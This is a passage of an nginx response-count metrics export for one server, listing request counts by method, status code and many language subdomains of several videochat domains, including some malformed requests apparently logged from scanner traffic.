nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ky.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lo.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lv.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mg.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="my.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ne.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="nl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="no.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pa.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pap.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pap.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sl.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ur.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uz.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="www.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="502",vhost="videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="161.97.120.25"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="3.0.3"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="af.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="al.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="am.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ar.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="az.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="be.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ca.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ceb.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="chm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cs.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cs.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cy.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="da.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="de.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ee.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="el.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="en.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="en.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eo.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="es.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="et.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ga.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="gu.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="he.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ht.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hu.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="hu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="id.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="is.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="it.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="jp.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="jv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ka.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ka.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="km.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="km.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ko.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ky.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ky.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lb.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lb.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lo.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mk.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ml.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ml.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mn.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mr.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mrj.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mrj.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ms.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ms.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="mt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="my.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ne.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="nl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="nl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="no.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="no.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pa.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pap.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pap.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="pt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ro.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sco.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sco.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="si.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sitemap.xml"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sr.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ssh-2.0"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="su.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sv.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sw.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="sw.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ta.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ta.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="te.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="te.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tg.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="th.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tl.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tr.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="tt.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="udm.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="uk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ur.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="uz.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="vi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="vmi460104.contaboserver.net"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="xh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="yi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="zh.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HELP",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HTTPVerbs.GET",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="H\\x00\\x00\\x00tj\\xA8\\x9E#D\\x98+\\xCA\\xF0\\xA7\\xBBl\\xC5\\x19\\xD7\\x8D\\xB6\\x18\\xEDJ\\x1En\\xC1\\xF9xu[l\\xF0E\\x1D-j\\xEC\\xD4xL\\xC9r\\xC9\\x15\\x10u\\xE0%\\x86Rtg\\x05fv\\x86]%\\xCC\\x80\\x0C\\xE8\\xCF\\xAE\\x00\\xB5\\xC0f\\xC8\\x8DD\\xC5\\x09\\xF4",status="400",vhost="-"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="KXFN",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MGLNDD_161.97.120.25_80",status="400",vhost="-"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="al.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="be.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="da.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="de.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="ee.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="el.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="eo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="fa.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="he.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="jv.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="km.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="kn.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="lv.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="mr.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="pl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="pt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="www.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="302",vhost="yi.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="am.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="chm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="es.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="fi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="hu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="is.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="kk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="kn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="lt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="mg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="my.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="ne.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="nl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="sk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="uz.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="MKCOL",status="503",vhost="videochat.world"} 1 